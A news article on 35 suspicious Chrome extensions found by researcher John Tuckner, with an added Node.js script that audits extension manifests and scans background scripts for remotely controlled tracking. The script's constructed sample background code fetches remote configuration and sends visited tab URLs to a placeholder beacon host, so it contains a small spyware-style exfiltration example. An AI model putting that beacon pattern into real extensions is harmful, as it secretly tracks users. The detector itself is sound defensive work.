
A recent investigation by independent researcher John Tuckner has found that dozens of extensions exhibiting suspicious behavior are currently listed on the Chrome Web Store, with combined installations exceeding four million. Many of these extensions are hidden from standard search results, while some even carry Google's "Featured" badge. Behind their seemingly legitimate façades lies a suite of capabilities suited to surveilling users and potentially interfering with browser operations.
In total, 35 extensions were identified, all of which share notable commonalities: reused code fragments, calls to the same remote servers, and permission requests granting access to sensitive browser functions. These include reading cookies, controlling browser tabs, intercepting web requests, injecting JavaScript into every visited page, and storing configuration within the browser itself. They also use internal event mechanisms to schedule recurring activity, such as the routine transmission of "heartbeat" signals to remote servers.
This constellation of permissions effectively grants these extensions near-total control over user activity within the browser, even when their declared purposes do not warrant such privileges. For instance, an extension titled Browse Securely, ostensibly meant to block malicious websites, also requests cookie access, an overreach by any reasonable standard.
Most of the flagged extensions feature heavily obfuscated code, which severely hinders analysis of what the code actually does. In one case, involving Fire Shield Extension Protection, the extension was found to connect to an external server and dynamically alter its behavior: after another questionable extension was installed, it began tracking websites visited, browsing history, and even screen resolution.
Some of these add-ons are concealed from public listings and are reachable only via direct links. Yet, curiously, they average roughly 114,000 installations each. More puzzling still, ten of them carry Google's "Featured" badge, a designation typically reserved for extensions that meet high design standards, offer robust functionality, and come from developers with verified identities. This casts significant doubt on Google's vetting process and on the criteria by which extensions are granted user trust.
Among the most dubious domains associated with these extensions is unknow[.]com, which appears in nearly all of them. Despite active monitoring, it remains difficult to ascertain exactly what data the extensions collect or transmit. Their behavior (remote server connections, dynamic toggling of functionality, and heavy obfuscation) strongly suggests spyware or infostealer components.
Tuckner emphasizes that while no explicit credential theft was observed during testing, the architecture and potential capabilities of these extensions constitute a serious threat. Any extension capable of receiving remote commands and altering its behavior based on server-side configurations must be considered a potential surveillance tool.
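The two traits the article keeps returning to, the shared permission cluster (cookies, tabs, webRequest, scripting, storage, scheduled heartbeats, injection into every page) and the heartbeat-plus-remote-configuration pattern that lets a server switch tracking on later, can both be checked mechanically. The Node.js script below is an added example; it is not code from Tuckner's report or from any of the extensions named on this page. The sample manifests, the "site blocker" permission baseline, and the background-script snippet are constructed for illustration, and the `.invalid` hostnames are placeholders rather than real infrastructure (the article itself names only unknow[.]com). Treating the alarms API as the "internal event mechanism" behind the heartbeats is also an assumption of this example.

```javascript
// Added example: audit a Chrome extension manifest for the permission cluster
// described above, and scan a background script for the heartbeat/remote-config
// pattern. All sample data below is constructed, not taken from the flagged extensions.

// Manifest permission names that grant the capabilities the article lists.
const CLUSTER = {
  cookies: "read/modify cookies for any site",
  tabs: "enumerate and control tabs (URLs, titles)",
  webRequest: "observe or intercept network requests",
  scripting: "inject JavaScript into pages",
  storage: "persist remotely supplied configuration",
  alarms: "schedule recurring work such as heartbeats", // assumption: alarms API
};

// True if the manifest can reach every page (MV3 host_permissions, or MV2
// URL patterns listed under permissions).
function hasAllUrls(manifest) {
  const patterns = [...(manifest.host_permissions || []), ...(manifest.permissions || [])];
  return patterns.some((p) => p === "<all_urls>" || /^(\*|https?):\/\/\*\/\*$/.test(p));
}

// expectedPermissions: what the extension's declared purpose plausibly needs.
// Anything granted beyond that list is reported as overreach.
function auditManifest(manifest, expectedPermissions = null) {
  const granted = new Set(manifest.permissions || []);
  const clusterHits = Object.keys(CLUSTER).filter((p) => granted.has(p));
  const allUrls = hasAllUrls(manifest);
  // <all_urls> only counts as dangerous when combined with code injection or
  // request interception; a declarativeNetRequest-only blocker needs it too.
  const allUrlsWeight = allUrls && (granted.has("scripting") || granted.has("webRequest")) ? 2 : 0;
  const score = clusterHits.length + allUrlsWeight;
  const overreach = expectedPermissions ? [...granted].filter((p) => !expectedPermissions.includes(p)) : [];
  return {
    name: manifest.name,
    clusterHits,
    allUrls,
    overreach,
    score,
    verdict: score >= 6 ? "high" : score >= 3 ? "medium" : "low",
  };
}

// Static indicators of the remotely steered behaviour described in the article.
const INDICATORS = {
  heartbeat: /chrome\.alarms\.create\s*\([^)]*periodInMinutes/s,
  remote_fetch: /fetch\s*\(\s*["'`]https?:\/\//,
  config_storage: /chrome\.storage\.(local|sync|session)\.set\s*\(/,
  tab_tracking: /chrome\.tabs\.onUpdated\.addListener|chrome\.history\./,
  dynamic_code: /\beval\s*\(|new\s+Function\s*\(/,
};

function scanBackgroundScript(source) {
  const indicators = Object.keys(INDICATORS).filter((k) => INDICATORS[k].test(source));
  // Collect every literal host the script talks to; compare against known IOCs.
  const remoteHosts = [...source.matchAll(/fetch\s*\(\s*["'`]https?:\/\/([^"'`/]+)/g)].map((m) => m[1]);
  return { indicators, remoteHosts: [...new Set(remoteHosts)] };
}

// --- constructed samples ---------------------------------------------------
const SAMPLE_SITE_BLOCKER = {
  manifest_version: 3,
  name: "Example Site Blocker (constructed)",
  permissions: ["cookies", "tabs", "webRequest", "scripting", "storage", "alarms"],
  host_permissions: ["<all_urls>"],
};
const SAMPLE_MINIMAL_BLOCKER = {
  manifest_version: 3,
  name: "Example Minimal Blocker (constructed)",
  permissions: ["declarativeNetRequest", "storage"],
  host_permissions: ["<all_urls>"],
};
// Assumed baseline for a "blocks malicious sites" extension.
const SITE_BLOCKER_BASELINE = ["declarativeNetRequest", "webRequest", "storage"];

const SAMPLE_BACKGROUND = `
chrome.alarms.create("hb", { periodInMinutes: 5 });
chrome.alarms.onAlarm.addListener(async () => {
  const cfg = await (await fetch("https://config.example.invalid/cfg")).json();
  chrome.storage.local.set({ cfg });
  if (cfg.track) chrome.tabs.onUpdated.addListener((id, info) => {
    fetch("https://beacon.example.invalid/hb", { method: "POST", body: info.url });
  });
});
`;

console.log(auditManifest(SAMPLE_SITE_BLOCKER, SITE_BLOCKER_BASELINE));
console.log(auditManifest(SAMPLE_MINIMAL_BLOCKER, SITE_BLOCKER_BASELINE));
console.log(scanBackgroundScript(SAMPLE_BACKGROUND));
```

To audit a real installation, point `auditManifest` at each `manifest.json` under the profile's Extensions directory (for example `~/.config/google-chrome/Default/Extensions/<id>/<version>/` on Linux) and `scanBackgroundScript` at the script named in `background.service_worker`; match the collected hosts against the IOC list in the report. Obfuscated scripts will defeat the literal-string indicators, which is itself a finding worth recording.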
As of now, Google has not commented on the findings or confirmed whether an investigation is underway. Attempts to reach the developers through the contact information listed in the privacy policies have gone unanswered. The full list of implicated extensions, along with their identifiers and indicators of compromise (IOCs), has been published in Tuckner’s report and its accompanying documentation.
The list includes names such as Fire Shield Chrome Safety, Protecto for Chrome, Securify Your Browser, Check My Permissions, among others. Users are strongly advised to remove these extensions immediately and audit all other add-ons installed in their browsers.